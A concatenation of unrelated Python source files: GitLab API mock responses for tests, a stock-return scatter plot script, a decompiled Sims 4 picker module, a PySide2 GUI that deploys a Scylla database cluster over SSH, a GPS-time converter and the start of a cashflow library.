'"avatar_url": "https://www.gravatar.com/avatar/c2525a7f58ae3776070e44c106c48e15?s=80&d=identicon",'
'"web_url": "http://192.168.1.8:3000/root", "expires_at": "2012-10-22T14:13:35Z",'
'"access_level": 30}')
content = content.encode("utf-8")
return response(200, content, headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/groups/1/members/1", method="put")
def resp_update_member(url, request):
headers = {'content-type': 'application/json'}
content = ('{"id": 1, "username": "raymond_smith", "name": "<NAME>",'
'"state": "active",'
'"avatar_url": "https://www.gravatar.com/avatar/c2525a7f58ae3776070e44c106c48e15?s=80&d=identicon",'
'"web_url": "http://192.168.1.8:3000/root", "expires_at": "2012-10-22T14:13:35Z",'
'"access_level": 10}')
content = content.encode("utf-8")
return response(200, content, headers, None, 5, request)
'''
DEPLOY KEY API
'''
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/projects/1/deploy_keys", method="get")
def resp_find_project_deploy_key(url, request):
headers = {'content-type': 'application/json'}
content = ('[{"id": 1,"title": "Public key",'
'"key": "ssh-rsa <KEY>'
'<KEY>
'"created_at": "2013-10-02T10:12:29Z"},{"id": 3,"title": "Another Public key",'
'"key": "ssh-rsa <KEY>'
'<KEY>
'"created_at": "2013-10-02T11:12:29Z"}]')
content = content.encode("utf-8")
return response(200, content, headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/projects/1/deploy_keys/1", method="get")
def resp_get_project_deploy_key(url, request):
headers = {'content-type': 'application/json'}
content = ('{"id": 1,"title": "Public key",'
'"key": "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAIEAiPWx6WM4lhHNedGfBpPJNPpZ7yKu+dnn1SJejgt4596k6YjzGGphH2TUxwKzxc'
'KDKKezwkpfnxPkSMkuEspGRt/aZZ9wa++Oi7Qkr8prgHc4soW6NUlfDzpvZK2H5E7eQaSeP3SAwGmQKUFHCddNaP0L+hM7zhFNzjFvpaMgJw0=",'
'"created_at": "2013-10-02T10:12:29Z"}')
content = content.encode("utf-8")
return response(200, content, headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/projects/1/deploy_keys", method="post")
def resp_create_project_deploy_key(url, request):
headers = {'content-type': 'application/json'}
content = ('{"id": 1,"title": "Public key",'
'"key": "ssh-rsa A<KEY>'
'KDKKezwkpfnxPkSMkuEspGRt/<KEY>=",'
'"created_at": "2013-10-02T10:12:29Z"}')
content = content.encode("utf-8")
return response(201, content, headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/projects/1/deploy_keys/1", method="delete")
def resp_delete_project_deploy_key(url, request):
headers = {'content-type': 'application/json'}
content = ('{}')
content = content.encode("utf-8")
return response(204, content, headers, None, 5, request)
'''
PROJECT API
'''
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/projects", method="get")
def resp_find_project(url, request):
headers = {'content-type': 'application/json'}
content = ('[{"id": 1,"description": null, "default_branch": "master",'
'"ssh_url_to_repo": "<EMAIL>:diaspora/diaspora-client.git",'
'"http_url_to_repo": "http://example.com/diaspora/diaspora-client.git",'
'"web_url": "http://example.com/diaspora/diaspora-client",'
'"readme_url": "http://example.com/diaspora/diaspora-client/blob/master/README.md",'
'"tag_list": ["example","disapora client"],"name": "Diaspora Client",'
'"name_with_namespace": "Diaspora / Diaspora Client","path": "diaspora-client",'
'"path_with_namespace": "diaspora/diaspora-client","created_at": "2013-09-30T13:46:02Z",'
'"last_activity_at": "2013-09-30T13:46:02Z","forks_count": 0,'
'"avatar_url": "http://example.com/uploads/project/avatar/4/uploads/avatar.png",'
'"star_count": 0}]')
content = content.encode("utf-8")
return response(200, content, headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/projects/1", method="get")
def resp_get_project(url, request):
headers = {'content-type': 'application/json'}
content = ('{"id": 1,"description": null, "default_branch": "master",'
'"ssh_url_to_repo": "git@example.com:diaspora/diaspora-client.git",'
'"http_url_to_repo": "http://example.com/diaspora/diaspora-client.git",'
'"web_url": "http://example.com/diaspora/diaspora-client",'
'"readme_url": "http://example.com/diaspora/diaspora-client/blob/master/README.md",'
'"tag_list": ["example","disapora client"],"name": "Diaspora Client",'
'"name_with_namespace": "Diaspora / Diaspora Client","path": "diaspora-client",'
'"path_with_namespace": "diaspora/diaspora-client","created_at": "2013-09-30T13:46:02Z",'
'"last_activity_at": "2013-09-30T13:46:02Z","forks_count": 0,'
'"avatar_url": "http://example.com/uploads/project/avatar/4/uploads/avatar.png",'
'"star_count": 0}')
content = content.encode("utf-8")
return response(200, content, headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/projects/foo-bar%2Fdiaspora-client", method="get")
def resp_get_project_by_name(url, request):
headers = {'content-type': 'application/json'}
content = ('{"id": 1,"description": null, "default_branch": "master",'
'"ssh_url_to_repo": "git@example.com:diaspora/diaspora-client.git",'
'"http_url_to_repo": "http://example.com/diaspora/diaspora-client.git",'
'"web_url": "http://example.com/diaspora/diaspora-client",'
'"readme_url": "http://example.com/diaspora/diaspora-client/blob/master/README.md",'
'"tag_list": ["example","disapora client"],"name": "Diaspora Client",'
'"name_with_namespace": "Diaspora / Diaspora Client","path": "diaspora-client",'
'"path_with_namespace": "diaspora/diaspora-client","created_at": "2013-09-30T13:46:02Z",'
'"last_activity_at": "2013-09-30T13:46:02Z","forks_count": 0,'
'"avatar_url": "http://example.com/uploads/project/avatar/4/uploads/avatar.png",'
'"star_count": 0}')
content = content.encode("utf-8")
return response(200, content, headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/groups/1/projects", method="get")
def resp_find_group_project(url, request):
headers = {'content-type': 'application/json'}
content = ('[{"id": 1,"description": null, "default_branch": "master",'
'"ssh_url_to_repo": "<EMAIL>:diaspora/diaspora-client.git",'
'"http_url_to_repo": "http://example.com/diaspora/diaspora-client.git",'
'"web_url": "http://example.com/diaspora/diaspora-client",'
'"readme_url": "http://example.com/diaspora/diaspora-client/blob/master/README.md",'
'"tag_list": ["example","disapora client"],"name": "Diaspora Client",'
'"name_with_namespace": "Diaspora / Diaspora Client","path": "diaspora-client",'
'"path_with_namespace": "diaspora/diaspora-client","created_at": "2013-09-30T13:46:02Z",'
'"last_activity_at": "2013-09-30T13:46:02Z","forks_count": 0,'
'"avatar_url": "http://example.com/uploads/project/avatar/4/uploads/avatar.png",'
'"star_count": 0}]')
content = content.encode("utf-8")
return response(200, content, headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/groups/1/projects/1", method="get")
def resp_get_group_project(url, request):
headers = {'content-type': 'application/json'}
content = ('{"id": 1,"description": null, "default_branch": "master",'
'"ssh_url_to_repo": "git@example.com:diaspora/diaspora-client.git",'
'"http_url_to_repo": "http://example.com/diaspora/diaspora-client.git",'
'"web_url": "http://example.com/diaspora/diaspora-client",'
'"readme_url": "http://example.com/diaspora/diaspora-client/blob/master/README.md",'
'"tag_list": ["example","disapora client"],"name": "Diaspora Client",'
'"name_with_namespace": "Diaspora / Diaspora Client","path": "diaspora-client",'
'"path_with_namespace": "diaspora/diaspora-client","created_at": "2013-09-30T13:46:02Z",'
'"last_activity_at": "2013-09-30T13:46:02Z","forks_count": 0,'
'"avatar_url": "http://example.com/uploads/project/avatar/4/uploads/avatar.png",'
'"star_count": 0}')
content = content.encode("utf-8")
return response(200, content, headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/projects", method="post")
def resp_create_project(url, request):
headers = {'content-type': 'application/json'}
content = ('{"id": 1,"description": null, "default_branch": "master",'
'"ssh_url_to_repo": "<EMAIL>:diaspora/diaspora-client.git",'
'"http_url_to_repo": "http://example.com/diaspora/diaspora-client.git",'
'"web_url": "http://example.com/diaspora/diaspora-client",'
'"readme_url": "http://example.com/diaspora/diaspora-client/blob/master/README.md",'
'"tag_list": ["example","disapora client"],"name": "Diaspora Client",'
'"name_with_namespace": "Diaspora / Diaspora Client","path": "diaspora-client",'
'"path_with_namespace": "diaspora/diaspora-client","created_at": "2013-09-30T13:46:02Z",'
'"last_activity_at": "2013-09-30T13:46:02Z","forks_count": 0,'
'"avatar_url": "http://example.com/uploads/project/avatar/4/uploads/avatar.png",'
'"star_count": 0}')
content = content.encode("utf-8")
return response(201, content, headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/projects/1", method="delete")
def resp_delete_project(url, request):
headers = {'content-type': 'application/json'}
content = ('{}')
content = content.encode("utf-8")
return response(204, content, headers, None, 5, request)
'''
HOOK API
'''
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/projects/1/hooks", method="get")
def resp_find_project_hook(url, request):
headers = {'content-type': 'application/json'}
content = ('[{"id": 1,"url": "http://example.com/hook","project_id": 3,'
'"push_events": true,"push_events_branch_filter": "","issues_events": true,'
'"confidential_issues_events": true,"merge_requests_events": true,'
'"tag_push_events": true,"note_events": true,"job_events": true,'
'"pipeline_events": true,"wiki_page_events": true,"enable_ssl_verification": true,'
'"created_at": "2012-10-12T17:04:47Z"}]')
content = content.encode("utf-8")
return response(200, content, headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/projects/1/hooks/1", method="get")
def resp_get_project_hook(url, request):
headers = {'content-type': 'application/json'}
content = ('{"id": 1,"url": "http://example.com/hook","project_id": 3,'
'"push_events": true,"push_events_branch_filter": "","issues_events": true,'
'"confidential_issues_events": true,"merge_requests_events": true,'
'"tag_push_events": true,"note_events": true,"job_events": true,'
'"pipeline_events": true,"wiki_page_events": true,"enable_ssl_verification": true,'
'"created_at": "2012-10-12T17:04:47Z"}')
content = content.encode("utf-8")
return response(200, content, headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/projects/1/hooks", method="post")
def resp_create_project_hook(url, request):
headers = {'content-type': 'application/json'}
content = ('{"id": 1,"url": "http://example.com/hook","project_id": 3,'
'"push_events": true,"push_events_branch_filter": "","issues_events": true,'
'"confidential_issues_events": true,"merge_requests_events": true,'
'"tag_push_events": true,"note_events": true,"job_events": true,'
'"pipeline_events": true,"wiki_page_events": true,"enable_ssl_verification": true,'
'"created_at": "2012-10-12T17:04:47Z"}')
content = content.encode("utf-8")
return response(201, content, headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/projects/1/hooks/1", method="delete")
def resp_delete_project_hook(url, request):
headers = {'content-type': 'application/json'}
content = ('{}')
content = content.encode("utf-8")
return response(204, content, headers, None, 5, request)
'''
RUNNER API
'''
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/runners/all", method="get")
def resp_find_runners_all(url, request):
headers = {'content-type': 'application/json'}
content = ('[{"active": true,"description": "test-1-20150125","id": 1,'
'"is_shared": false,"ip_address": "127.0.0.1","name": null,'
'"online": true,"status": "online"},{"active": true,'
'"description": "test-2-20150125","id": 2,"ip_address": "127.0.0.1",'
'"is_shared": false,"name": null,"online": false,"status": "offline"}]')
content = content.encode("utf-8")
return response(200, content, headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/runners", method="get")
def resp_find_runners_list(url, request):
headers = {'content-type': 'application/json',
"X-Page": 1,
"X-Next-Page": 2,
"X-Per-Page": 1,
"X-Total-Pages": 1,
"X-Total": 2}
content = ('[{"active": true,"description": "test-1-20150125","id": 1,'
'"is_shared": false,"ip_address": "127.0.0.1","name": null,'
'"online": true,"status": "online"},{"active": true,'
'"description": "test-2-20150125","id": 2,"ip_address": "127.0.0.1",'
'"is_shared": false,"name": null,"online": false,"status": "offline"}]')
content = content.encode("utf-8")
return response(200, content, headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/runners/1", method="get")
def resp_get_runner(url, request):
headers = {'content-type': 'application/json'}
content = ('{"active": true,"description": "test-1-20150125","id": 1,'
'"is_shared": false,"ip_address": "127.0.0.1","name": null,'
'"online": true,"status": "online"}')
content = content.encode("utf-8")
return response(200, content, headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/runners", method="post")
def resp_create_runner(url, request):
headers = {'content-type': 'application/json'}
content = ('{"active": true,"description": "test-1-20150125","id": 1,'
'"is_shared": false,"ip_address": "127.0.0.1","name": null,'
'"online": true,"status": "online"}')
content = content.encode("utf-8")
return response(201, content, headers, None, 5, request)
@urlmatch(scheme="http", netloc="localhost", path="/api/v4/runners/1", method="delete")
def resp_delete_runner(url, request):
headers = {'content-type': 'application/json'}
content = ('{}')
content = content.encode("utf-8")
return response(204, content, headers, None, 5, request)
| 2.109375 | 2 |
np/reference/ch9code/scatterprice.py | focusunsink/study_python | 0 | 12761011 | from matplotlib.finance import quotes_historical_yahoo
import sys
from datetime import date
import matplotlib.pyplot as plt
import numpy as np
today = date.today()
start = (today.year - 1, today.month, today.day)
symbol = 'DISH'
if len(sys.argv) == 2:
symbol = sys.argv[1]
quotes = quotes_historical_yahoo(symbol, start, today)
quotes = np.array(quotes)
close = quotes.T[4]
volume = quotes.T[5]
ret = np.diff(close)/close[:-1]
volchange = np.diff(volume)/volume[:-1]
fig = plt.figure()
ax = fig.add_subplot(111)
ax.scatter(ret, volchange, c=ret * 100, s=volchange * 100, alpha=0.5)
ax.set_title('Close and volume returns')
ax.grid(True)
plt.show()
| 2.6875 | 3 |
Scripts/simulation/interactions/picker/situation_picker_interaction.py | velocist/TS4CheatsInfo | 0 | 12761012 | <gh_stars>0
# uncompyle6 version 3.7.4
# Python bytecode 3.7 (3394)
# Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)]
# Embedded file name: T:\InGame\Gameplay\Scripts\Server\interactions\picker\situation_picker_interaction.py
# Compiled at: 2017-08-29 22:16:16
# Size of source mod 2**32: 4323 bytes
from event_testing.resolver import InteractionResolver
from filters.tunable import FilterResult
from interactions.base.picker_interaction import SimPickerInteraction, AutonomousSimPickerSuperInteraction
from interactions.base.picker_strategy import SimPickerEnumerationStrategy
from sims4.tuning.tunable import TunableList, TunableVariant, TunablePackSafeReference
from sims4.tuning.tunable_base import GroupNames
from sims4.utils import flexmethod
from situations.situation_by_definition_or_tags import SituationSearchByDefinitionOrTagsVariant
from vet.vet_picker_strategy import VetCustomerPickerEnumerationStrategy
import services, sims4
class SituationSimsPickerMixin:
INSTANCE_TUNABLES = {'valid_situations':SituationSearchByDefinitionOrTagsVariant(description='\n Situations where the guest list will be collected to populate the picker.\n ',
tuning_group=GroupNames.PICKERTUNING),
'job_filter':TunableList(description='\n If provided, only looks for Sims with the specified jobs.\n ',
tunable=TunablePackSafeReference(manager=(services.get_instance_manager(sims4.resources.Types.SITUATION_JOB))),
tuning_group=GroupNames.PICKERTUNING)}
REMOVE_INSTANCE_TUNABLES = ('sim_filter', 'sim_filter_household_override', 'sim_filter_requesting_sim',
'include_uninstantiated_sims', 'include_instantiated_sims',
'include_actor_sim', 'include_target_sim')
@flexmethod
def _get_valid_sim_choices_gen(cls, inst, target, context, **kwargs):
inst_or_cls = inst if inst is not None else cls
for situation in cls.valid_situations.get_all_matching_situations():
for sim in situation.all_sims_in_situation_gen():
if cls.job_filter:
if situation.get_current_job_for_sim(sim) not in cls.job_filter:
continue
if inst_or_cls.sim_tests:
if inst:
interaction_parameters = inst.interaction_parameters.copy()
else:
interaction_parameters = kwargs.copy()
interaction_parameters['picked_item_ids'] = {
sim.sim_id}
resolver = InteractionResolver(cls, inst, target=target, context=context, **interaction_parameters)
if inst_or_cls.sim_tests.run_tests(resolver):
yield FilterResult(sim_info=(sim.sim_info))
else:
yield FilterResult(sim_info=(sim.sim_info))
class SituationSimsPickerInteraction(SituationSimsPickerMixin, SimPickerInteraction):
pass
class AutonomousSituationSimsPickerInteraction(SituationSimsPickerMixin, AutonomousSimPickerSuperInteraction):
INSTANCE_TUNABLES = {'choice_strategy': TunableVariant(description='\n Strategy to use for picking a Sim.\n ',
default='default_sim_picker',
default_sim_picker=(SimPickerEnumerationStrategy.TunableFactory()),
vet_customer_picker=(VetCustomerPickerEnumerationStrategy.TunableFactory()),
tuning_group=(GroupNames.PICKERTUNING))}
REMOVE_INSTANCE_TUNABLES = ('test_compatibility', )
def __init__(self, *args, **kwargs):
(super().__init__)(args, choice_enumeration_strategy=self.choice_strategy, **kwargs) | 1.679688 | 2 |
scylla.py | amoskong/scylla-cluster-manager | 0 | 12761013 | <gh_stars>0
#!/usr/bin/env python3
from PySide2.QtCore import *
from PySide2.QtGui import *
from PySide2.QtWidgets import *
import sys
import os
import time
from concurrent.futures import ThreadPoolExecutor
import scylla_gui
import gen_cluster
import scylla_tools
import subprocess
import signal
import requests
from utils import *
_VERSION_ = '2021.01'
class MySig(QObject):
log = Signal(str)
class MyMainWindow(QMainWindow, scylla_gui.Ui_MainWindow):
def __init__(self, app, parent=None):
"""
Init function for MyMainWindow class
"""
super(MyMainWindow, self).__init__(parent)
self.app = app
self.nodes = [
["192.168.66.222", "192.168.66.222", "DC1", "RACK1", "/tmp/data/scylla", "192.168.66.222", "256", "auto", "auto"],
["192.168.66.200", "192.168.66.200", "DC1", "RACK1", "/tmp/data/scylla", "192.168.66.222", "256", "auto", "auto"]]
self.nodes = [
["192.168.127.12", "172.31.6.66", "DC1", "RACK1", "/tmp/data/scylla", "192.168.127.12", "256", "auto", "auto"],
["172.16.31.10", "172.31.10.145", "DC1", "RACK1", "/tmp/data/scylla", "192.168.127.12", "256", "auto", "auto"]]
self.nodes = [
["127.0.0.1", "127.0.0.1", "DC1", "RACK1", "/tmp/data/scylla/1", "127.0.0.1", "256", "1", "512"],
["127.0.0.2", "127.0.0.2", "DC1", "RACK1", "/tmp/data/scylla/2", "127.0.0.1", "256", "1", "512"],
["127.0.0.3", "127.0.0.3", "DC1", "RACK1", "/tmp/data/scylla/3", "127.0.0.1", "256", "1", "512"]]
self.node_default = self.nodes[0]
self.setupUi(self)
title = "Scylla Cluster Manager" + " - " + _VERSION_
self.setWindowTitle(title)
self.show_cluster_table()
self.show_node_table()
self.depoly_button.clicked.connect(self.deploy_button_callback)
self.addnode_button.clicked.connect(self.addnode_button_callback)
self.delnode_button.clicked.connect(self.delnode_button_callback)
self.executor = ThreadPoolExecutor(max_workers=2)
self.depoly_threads = []
self.sig = MySig()
self.sig.log.connect(self.log_table.append)
self.display_logo()
for i in scylla_package_list.keys():
self.scylla_list.addItem(i)
def display_logo(self):
pixmap = QPixmap('./scylla.png')
self.logo.setPixmap(pixmap)
self.logo.show()
def get_cluster_info(self):
row = self.cluster_table.rowCount()
col = self.cluster_table.columnCount()
self.cluster = [[0 for x in range(col)] for x in range(row)]
for row in range(self.cluster_table.rowCount()):
for col in range(self.cluster_table.columnCount()):
self.cluster[row][col] = self.cluster_table.item(row, col).text()
return self.cluster[0]
def get_nodes_info(self):
for row in range(self.node_table.rowCount()):
for col in range(self.node_table.columnCount()):
self.nodes[row][col] = self.node_table.item(row, col).text()
return self.nodes
def addnode_button_callback(self):
self.nodes.append(self.node_default)
self.show_node_table()
def delnode_button_callback(self):
if not self.nodes:
QMessageBox.warning(self, 'Warning', 'There is no node can be deleted')
return
selected_rows = []
for item in self.node_table.selectedItems():
selected_rows.append(item.row())
selected_rows = list(set(selected_rows))
# delete last item if no item is selected
if len(selected_rows) == 0:
self.nodes.pop(-1)
# delete the selected items
for i in sorted(selected_rows, reverse=True):
self.nodes.pop(i)
self.show_node_table()
def gen_button_callback(self):
pass
def log(self, cmd):
print(cmd)
self.sig.log.emit(cmd)
def run_cmd(self, cmd):
self.log(cmd)
os.system(cmd)
def get_ssh(self, user, ip, key, cmd):
return f"ssh -i {key} -o StrictHostKeyChecking=no {user}@{ip} {cmd}"
def get_scp(self, user, ip, key, src, dst):
return f"scp -i {key} -r -q -o StrictHostKeyChecking=no {src} {user}@{ip}:{dst}"
def show_cluster_status(self, ip):
status = scylla_tools.nodetool_status(ip)
for node in status:
self.log(f"{node}")
def deploy_button_callback(self):
if len(self.depoly_threads) != 0:
self.log("One running")
self.log_table.clear()
t = self.executor.submit(self.do_deploy_button_callback)
self.depoly_threads.append(t)
def do_deploy_button_callback(self):
start_time = time.time()
if not self.nodes:
return
cluster = self.get_cluster_info()
cluster_name = cluster[0]
ssh_user = cluster[1]
ssh_key = cluster[2]
self.log("=== Step 1: Generate config file ===")
msgs = gen_cluster.gen_cmds(cluster_name, ssh_user, self.get_nodes_info())
for msg in msgs:
self.log(msg)
self.log("=== Step 2: Copy scylla-package.tar.gz ===")
# Prepare the SSH authorized key firstly
for info in self.nodes:
ip = info[0]
cmd = f"ssh-copy-id -i {ssh_key} -o StrictHostKeyChecking=no {ssh_user}@{ip}"
self.run_cmd(cmd)
for info in self.nodes:
ip = info[0]
directory = info[4]
tarball = "scylla-package.tar.gz"
cmd = self.get_ssh(ssh_user, ip, ssh_key, f"mkdir -p {directory}")
self.run_cmd(cmd)
pkg_idx = self.scylla_list.currentIndex()
if pkg_idx == 0: # 'Local ./scylla-package.tar.gz'
cmd = self.get_scp(ssh_user, ip, ssh_key, tarball, directory)
else:
scylla_url = list(scylla_package_list.values())[pkg_idx]
cmd = self.get_ssh(ssh_user, ip, ssh_key, f'curl -o {directory}/scylla-package.tar.gz {scylla_url}')
self.run_cmd(cmd)
cmd = self.get_ssh(ssh_user, ip, ssh_key, f"tar xf {directory}/{tarball} -C {directory}")
self.run_cmd(cmd)
cmd = self.get_ssh(ssh_user, ip, ssh_key, f"{directory}/scylla/install.sh --nonroot")
self.run_cmd(cmd)
cmd = self.get_scp(ssh_user, ip, ssh_key, f"{CMD_FILE_PREFIX}.{ip}", directory)
self.run_cmd(cmd)
cmd = self.get_ssh(ssh_user, ip, ssh_key, f"chmod +x {directory}/{CMD_FILE_PREFIX}.{ip}")
self.run_cmd(cmd)
self.log("=== Step 3: Depoly the first node in the cluster ===")
for info in self.nodes[0:1]:
ip = info[0]
directory = info[4]
node_name = f"{CMD_FILE_PREFIX}.{ip}"
cmd = self.get_ssh(ssh_user, ip, ssh_key, f"{directory}/{node_name}")
self.run_cmd(cmd)
self.log("=== Step 4: Depoly the remaining nodes in the cluster ===")
threads = []
for info in self.nodes[1:]:
ip = info[0]
directory = info[4]
node_name = f"{CMD_FILE_PREFIX}.{ip}"
cmd = self.get_ssh(ssh_user, ip, ssh_key, f"{directory}/{node_name}")
self.log(cmd)
p = subprocess.Popen(cmd, shell=True)
threads.append(p)
for p in threads:
p.wait()
elapsed_time = time.time() - start_time
msg = f"=== Step 5: Depoly {len(self.nodes)} nodes successfully in {elapsed_time} seconds! ==="
self.log(msg)
node = self.nodes[0][0]
cmd = self.get_ssh(ssh_user, node, ssh_key, '~/scylladb/bin/scylla --version')
self.run_cmd(cmd)
self.show_cluster_status(node)
def get_cluster_header(self):
"""
Get the apps header to display on the ui
"""
headers = [u'Cluster Name', u'SSH User', u'SSH Keys']
return headers
def show_cluster_table(self):
"""
Display all the devices
"""
headers = self.get_cluster_header()
_DEFAULT_HEADER_SIZE_ = 25
devices = [1]
self.cluster_table.clear()
self.cluster_table.setSortingEnabled(False)
self.cluster_table.setRowCount(len(devices))
self.cluster_table.setColumnCount(len(headers))
self.cluster_table.setHorizontalHeaderLabels(headers)
self.cluster_table.horizontalHeader().setSectionResizeMode(QHeaderView.Stretch)
self.cluster_table.verticalHeader().setSectionResizeMode(QHeaderView.Fixed)
self.cluster_table.verticalHeader().setDefaultSectionSize(_DEFAULT_HEADER_SIZE_)
apps = [["MyScyllaCluster", os.getenv('USER', 'asias'), "~/.ssh/id_rsa"]]
row = 0
for app in apps:
col = 0
for it in app:
item = QTableWidgetItem(it)
self.cluster_table.setItem(row, col, item)
col += 1
row += 1
self.cluster_table.resizeColumnsToContents()
def get_node_header(self):
"""
Get the apps header to display on the ui
"""
headers = [u'Public IP', u'Private IP', u'DC', u'RACK', u'Data Directory', u'Contact Point(Seed)', u'Num Tokens', u'CPU Cores', u'Memory MB']
return headers
def show_node_table(self):
"""
Display all the devices
"""
headers = self.get_node_header()
_DEFAULT_HEADER_SIZE_ = 25
self.node_table.clear()
self.node_table.setSortingEnabled(False)
self.node_table.setRowCount(len(self.nodes))
self.node_table.setColumnCount(len(headers))
self.node_table.setHorizontalHeaderLabels(headers)
self.node_table.horizontalHeader().setSectionResizeMode(QHeaderView.Stretch)
# Display all content of two columns
self.node_table.horizontalHeader().setSectionResizeMode(4, QHeaderView.ResizeToContents)
self.node_table.horizontalHeader().setSectionResizeMode(5, QHeaderView.ResizeToContents)
self.node_table.verticalHeader().setSectionResizeMode(QHeaderView.Fixed)
self.node_table.verticalHeader().setDefaultSectionSize(_DEFAULT_HEADER_SIZE_)
row = 0
for node in self.nodes:
col = 0
for it in node:
item = QTableWidgetItem(it)
self.node_table.setItem(row, col, item)
col += 1
row += 1
#self.node_table.resizeColumnsToContents()
if __name__ == '__main__':
signal.signal(signal.SIGINT, signal.SIG_DFL)
app = QApplication(sys.argv)
w = MyMainWindow(app)
w.show()
app.exec_()
| 1.96875 | 2 |
gravityspytools/collectioninfo/timeconvert.py | olipatane/gravityspytools | 0 | 12761014 | <filename>gravityspytools/collectioninfo/timeconvert.py
import datetime
# Define GPS leap seconds
def getleaps():
leaps = [46828800, 78364801, 109900802, 173059203, 252028804,
315187205, 346723206, 393984007, 425520008, 457056009,
504489610, 551750411, 599184012, 820108813, 914803214,
1025136015, 1119744016, 1167264017]
return leaps
# Test to see if a GPS second is a leap second
def isleap(gpsTime):
isLeap = False
leaps = getleaps()
lenLeaps = len(leaps)
for i in leaps:
if gpsTime is i:
isLeap = True
return isLeap
# Count number of leap seconds that have passed
def countleaps(gpsTime, dirFlag):
leaps = getleaps()
lenLeaps = len(leaps)
nleaps = 0 # number of leap seconds prior to gpsTime
for i in range(lenLeaps):
if 'unix2gps' is not dirFlag:
if (gpsTime >= leaps[i] - i):
nleaps += 1
elif 'gps2unix' is not dirFlag:
if (gpsTime >= leaps[i]):
nleaps += 1
else:
print('ERROR Invalid Flag!')
return nleaps
# Convert GPS Time to Unix Time
def gps2unix(gpsTime):
# Add offset in seconds
unixTime = gpsTime + 315964800
nleaps = countleaps(gpsTime, 'gps2unix')
unixTime = unixTime - nleaps
if (isleap(gpsTime)):
unixTime = unixTime + 0.5
return unixTime
def gps2ppl(gpsTime):
return datetime.datetime.fromtimestamp(int(gps2unix(gpsTime)))\
.strftime('%Y-%m-%d %H:%M')
| 3.09375 | 3 |
dcf/cashflows/cashflow.py | pbrisk/dcf | 7 | 12761015 | # -*- coding: utf-8 -*-
# dcf
# ---
# A Python library for generating discounted cashflows.
#
# Author: sonntagsgesicht, based on a fork of Deutsche Postbank [pbrisk]
# Version: 0.7, copyright Tuesday, 31 May 2022
# Website: https://github.com/sonntagsgesicht/dcf
# License: Apache License 2.0 (see LICENSE file)
from collections import OrderedDict
from inspect import signature
from warnings import warn
from ..plans import DEFAULT_AMOUNT
from .payoffs import FixedCashFlowPayOff, RateCashFlowPayOff
class CashFlowList(object):
_cashflow_details = 'cashflow', 'pay date'
@property
def table(self):
""" cashflow details as list of tuples """
# print(tabulate(cf.table, headers='firstrow')) # for pretty print
header, table = list(), list()
for d in self.domain:
payoff = self._flows.get(d, 0.)
if hasattr(payoff, 'details'):
fwd = getattr(self, 'forward_curve', None)
details = payoff.details(fwd)
details['pay date'] = d
else:
details = {'cashflow': float(payoff), 'pay date': d}
for k in self.__class__._cashflow_details:
if k in details and k not in header:
header.append(k)
table.append(tuple(details.get(h, '') for h in header))
return [tuple(header)] + table
@property
def domain(self):
""" payment date list """
return self._domain
@property
def origin(self):
""" cashflow list start date """
if self._origin is None and self._domain:
return self._domain[0]
return self._origin
@property
def kwargs(self):
"""returns constructor arguments as ordered dictionary
(under construction)
"""
warn('%s().kwargs is under construction' % self.__class__.__name__)
kw = OrderedDict()
for name in signature(self.__class__).parameters:
attr = None
if name == 'amount_list':
attr = tuple(self._flows[d] for d in self.domain)
if name == 'payment_date_list':
attr = self.domain
attr = getattr(self, '_' + name, attr)
if isinstance(attr, (list, tuple)):
attr = tuple(getattr(a, 'kwargs', a) for a in attr)
attr = tuple(getattr(a, '__name__', a) for a in attr)
attr = getattr(attr, 'kwargs', attr)
attr = getattr(attr, '__name__', attr)
if attr is not None:
kw[name] = attr
return kw
def payoff(self, date):
"""dictionary of payoffs with pay_date keys"""
if isinstance(date, (tuple, list)):
return tuple(self.payoff(i) for i in date)
return self._flows.get(date, None)
def __init__(self, payment_date_list=(), amount_list=(), origin=None):
""" basic cashflow list object
:param domain: list of cashflow dates
:param data: list of cashflow amounts
:param origin: origin of object,
i.e. start date of the cashflow list as a product
Basicly |CashFlowList()| works like a read-only dictionary
with payment dates as keys.
And the |CashFlowList().domain| property holds the payment date list.
>>> from dcf import CashFlowList
>>> cf_list = CashFlowList([0, 1], [-100., 100.])
>>> cf_list.domain
(0, 1)
In order to get cashflows
>>> cf_list[0]
-100.0
>>> cf_list[cf_list.domain]
(-100.0, 100.0)
This works even for dates without cashflow
>>> cf_list[-1, 0 , 1, 2]
(0.0, -100.0, 100.0, 0.0)
"""
if isinstance(amount_list, (int, float)):
amount_list = [amount_list] * len(payment_date_list)
if not len(amount_list) == len(payment_date_list):
msg = f"{self.__class__.__name__} arguments " \
f"`payment_date_list` and `amount_list` " \
f"must have same length."
raise ValueError(msg)
self._origin = origin
self._domain = tuple(payment_date_list)
self._flows = dict(zip(payment_date_list, amount_list))
def __getitem__(self, item):
if isinstance(item, (tuple, list)):
return tuple(self[i] for i in item)
else:
payoff = self._flows.get(item, 0.)
if not isinstance(payoff, (int, float)):
_ = None
if hasattr(self, 'payoff_model'):
_ = self.payoff_model
elif hasattr(self, 'forward_curve'):
_ = self.forward_curve
payoff = payoff(_)
return payoff
def __call__(self, _=None):
flows = list()
